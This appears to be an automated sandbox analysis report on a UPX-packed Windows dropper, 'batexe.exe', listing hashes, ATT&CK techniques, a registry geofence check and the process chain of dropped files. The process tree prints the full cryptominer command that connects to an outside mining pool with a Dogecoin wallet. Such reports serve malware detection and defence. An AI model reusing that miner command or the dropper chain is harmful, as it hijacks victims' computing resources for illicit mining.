73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
290s
platform
windows10-2004_x64
resource
win10v2004-20231222-ja
resource tags

arch:x64arch:x86image:win10v2004-20231222-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
20-02-2024 04:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
4468	b2e.exe
5536	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
5536	cpuminer-sse2.exe
5536	cpuminer-sse2.exe
5536	cpuminer-sse2.exe
5536	cpuminer-sse2.exe
5536	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3428-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3428 wrote to memory of 4468	3428	batexe.exe	84
PID 3428 wrote to memory of 4468	3428	batexe.exe	84
PID 3428 wrote to memory of 4468	3428	batexe.exe	84
PID 4468 wrote to memory of 5340	4468	b2e.exe	85
PID 4468 wrote to memory of 5340	4468	b2e.exe	85
PID 4468 wrote to memory of 5340	4468	b2e.exe	85
PID 5340 wrote to memory of 5536	5340	cmd.exe	88
PID 5340 wrote to memory of 5536	5340	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3428
- C:\Users\Admin\AppData\Local\Temp\9E34.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\9E34.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9E34.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A0C4.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5340
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5536

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9E34.tmp\b2e.exe

Filesize
2.9MB

MD5
9bcc23571dbddc3763af0125a320989b

SHA1
b70b80e65db527312d7fb8272829ca60745fcd4e

SHA256
67ce5d7963efa3bb9baff7a9dec01a5976eb6c7ff75707de75a36dd055284025

SHA512
5d7adde7926c309020aa976186877668db230f30e52c358d8f1b02b03998afdbd256dbf660b9f617f2bc1a5354a7a04437b597a037c153491914ef767b13d2ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\9E34.tmp\b2e.exe

Filesize
834KB

MD5
03b72fd508eccc374a0dbe4eb1763770

SHA1
febd427165b96af91203548611b307caf728a65b

SHA256
ceae4f52f3ae3a80031de4852a621ffa4fe5d416398b4b929e1857a3a5be2be0

SHA512
4972054bda1e19065519e66b985470a39604c2282e4333dbb638dc2b0ac0f45cc2175ac1daa1af2bdef9c807b10af275b338df65244f7dec16cbe5d15c70532a

Download Submit
C:\Users\Admin\AppData\Local\Temp\9E34.tmp\b2e.exe

Filesize
936KB

MD5
289309ddd7db3c6a5428c7cdc0560b7c

SHA1
e003449dc7e72f7405fc772983883d2469cf6b82

SHA256
bf86f4295f48a4b62d1d644915f86765cbcd3d493fca4f0ca014b263ca5294a6

SHA512
65a9e44b75387590494ec5982d4b0471f6132b2d79358488989dafe09e4a28b95759a89dea75044e2f287e54549ae57316e8dcf3f6a6c0f8a7f7733ab68e0f0c

Download Submit
C:\Users\Admin\AppData\Local\Temp\A0C4.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
229KB

MD5
99bc32801c17303b516ea91786ae531a

SHA1
c6d654c85033fdbf5e969fe0a22d7763ab058015

SHA256
f4717f62fe6f369890b61ae32adf06688485be6024540f95cefdbfa343f51346

SHA512
e8b11440cf8c4c6039f6248f63ec1f38fede5ce52375423038d89039e876f532c0479b219733b365fc9fec29ac0f890b22d8298bd1572f245f3b534624e151e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
220KB

MD5
f6399d39ac4d9dadd65faa0b2287e858

SHA1
bf5137e517c6aaac49de86ebec06eec884d5f67c

SHA256
8f2006d5f389937da3d7af63517c343a243403dfea34b34c22a8987190df9bcb

SHA512
bc04f5dc21b135856c8075614bfeb69c1d6a18fdedc670603dc9c87b53cb4e996e1ff131b37fe1543ec7ca3b9b0b147c6bba33eaf902e101a05379ac770e9e82

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
192KB

MD5
dc04e9e77eddac150ab2977742bd2d0a

SHA1
961d728ae5bd100094f2ecb4970f13910ef9b187

SHA256
928d5d9653201eebf724b73e7408887c54efcf54215c7104eb3e5be3d7e223af

SHA512
1ce23455ea19f8a8625e407786c6d77d858023c53c8bab4d9efddb2c9c30a7de979f3c82c85d00d721cefb17eda1da84a42c6110ebeccbb2bfe7c86b7e6bcb84

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
312KB

MD5
7281d8741939afba3e3521e12872ee93

SHA1
f52b00d2c38ae491e760a35555484d0853b38336

SHA256
da9953c5197e7ba2a4b6760dc79bb56bb6183ea0a77cb088ea5384f3752db3ba

SHA512
8a61277de5fc892fd9e21a0a35f811aab33db6b7dcf28a507a970d64e62917242c0ab31281e64b748a61bed98c4e80a53785921e360387ed2b1285739b23e4e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
300KB

MD5
2c82d613e8f9e5325e18cf9d8ece1412

SHA1
08b8a083549421b8d8e550a7025aaf5f48aa3db5

SHA256
aca5cf75215a9e0918ea2025aef6aa144bc97f0e137b1739e51eaaed7b7505ea

SHA512
0e21a84e09617090501c627007a7f949190d3d7941b67015dd9f1360806e4e5aedba4550bdd05326bd4b33442f79ae6d4ede6d6b59188951b47bb1a5862d9729

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
162KB

MD5
efe14b7aa882e3310787ba915c1e79d5

SHA1
5ec05a6314a140e6d8039306979181e1ab596ada

SHA256
39d6d90012f2610228404e0819376f744aedebfe4ac56200769c54df9cb375a8

SHA512
cab1edf5b7e8631b576eef2c39393a77236247ab73ced59504b8d64ae2c13c588448e00aea0d926f81174d60f237c9c29235a3777f7422337504fbb69eadffe1

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
254KB

MD5
0fafef2c6bd3d33e35b9abf252d0cbf3

SHA1
c532c0285c517c432ffe7779c815ab6fa0ae8df4

SHA256
43c7641c2fd11180832e29f91baaa9fb4c9309fe848de153e27c7f90e91efa7e

SHA512
75d0ee7ff178e132875b4c6defbfb952ca966de8779ae79b7f2b14712a214a1856668f6fb21be31604f27f434c7d95b9aa91bd266f4d68f6829f2b1fd1face6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
175KB

MD5
b49cbd3b055bdf16418a97bd55930ed9

SHA1
9fa1d53252a4e10f1dd96d26b11614db19d17865

SHA256
6187eaf5ca132de522d33d398919c177e6ecfdf22219a40637dcc4c0295100aa

SHA512
5d0c85d414ab23ecb6a12bf83df9aff610b4fdcbce829447ca49905f368fb1e7284328325cc49a3ddb5295de0e099a9fce45878cac73c17a42cefeeeb4679928

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
208KB

MD5
220e13994833ec356550f6baff9c8fe7

SHA1
47cd40d746a8e70727d01791a8472ce094549e49

SHA256
d5af37adaeea44a87bf7d6ac43b9f0a69dffcd3a6397f853f73d65f632e89d67

SHA512
0849d887b730e8ace5b4c305373a48383d1686dc238cb925f21721406a46cadc88db6dae408db875e49f13c3038102fc875548cfce2617c703ac3e329c7d81f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
208KB

MD5
7b964955d8ed2bdd4d5ff82f2781b2e7

SHA1
c803255cc2a797924e98b525a8a43ce47cc83532

SHA256
2ee5ca3b431933d29c422cb93bdd9141a45350c0db8c10a0915eed13d4154a69

SHA512
a34b42ffafa3cffa04dbee3918a7b2ffb4f1f3ff1a868c70f7a3c2b7eea89efdaf5829b7e6c68afe786382e4469d5f274be1d9540891ac86dcb589d67286aa7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
201KB

MD5
0196f16c2f78548c7ee557141d052216

SHA1
ec93b579794ec01da18b2a09c8cbe509a48975a3

SHA256
b748623a283431fd59d53b61cb0a5a007eb8328172ab59cfc458aaeb95c5973c

SHA512
a0368b4771fab318e934f3b27bcdf78eb7dbb4f823e0ca15a470d41eab8c4d87807340494a9b6839b57a87e01b1aa2512b69baa8b82610f9cca3f9b034006e14

Download Submit
memory/3428-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4468-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4468-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5536-46-0x000000005FC20000-0x000000005FCB8000-memory.dmp

Filesize
608KB

Download
memory/5536-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5536-44-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/5536-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/5536-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5536-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5536-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5536-45-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/5536-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5536-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5536-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5536-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5536-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5536-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5536-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5536-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download